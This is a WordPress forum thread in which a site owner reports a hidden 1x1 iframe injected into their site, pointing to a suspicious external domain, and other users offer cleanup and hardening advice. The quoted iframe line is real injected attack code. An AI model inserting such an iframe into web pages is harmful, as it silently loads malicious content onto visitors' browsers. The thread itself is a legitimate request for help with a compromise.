Was I hacked? (7 posts)

  1. deiffert
    Posted 5 years ago #

    http://believerscenter.com - Line #1:

    <iframe src="http://ulbmrwtvpa.cz.cc/?go=1" width="1" height="1"></iframe>

    Can't figure out how to get this iframe off or where it's coming from!!!

  2. Tara
    Volunteer Moderator
    Posted 5 years ago #

  3. deiffert
    Posted 5 years ago #

    Thanks for the response.

    Hmmm.... well the report it spits out is pretty intimidating.

    Level Severe (313 matches)

    Scrolled through for about 5 minutes and couldn't find anything significant to me. All pretty basic stuff, although with that large amount it's possible that I could have missed something. Is there something specific I should search for?

    Has no one else had this problem?

  4. http://codex.wordpress.org/FAQ_My_site_was_hacked is a good resource to start with

  5. esmi
    Forum Moderator
    Posted 5 years ago #

  6. Richard Coan
    Posted 5 years ago #

    Remember to follow rule number one when you discover foreign code on your site:
    1) Do not panic.

    This one of the pretty common "hacks" I'd run across while maintaining WordPress Sites for my last contract. If this was inserted onto every page, post, etc then your database was compromised possibly. Changing the Password is recommended, note you'll need to update your WordPress config file manually with the new password. Also you may want to look into securing your wp-config file, it can be placed outside of the web-root. You could also deny access to the file via the htaccess file.

    Check your plugins also, one of them may have been compromised which allowed the someone access to your database. I was using the category-page plugin on one site which I later parsed through the entire plugin and found it was compromised.

    Media Temple has a guide to cleaning up your database if that is your host, pretty simple SQL method of finding something like that iframe and removing them.

    Good luck, if you have and questions ask.

  7. Richard Coan
    Posted 5 years ago #

    Here is one of the links for hardening wordpress once you are all cleaned up:

Topic Closed

This topic has been closed to new replies.

About this Topic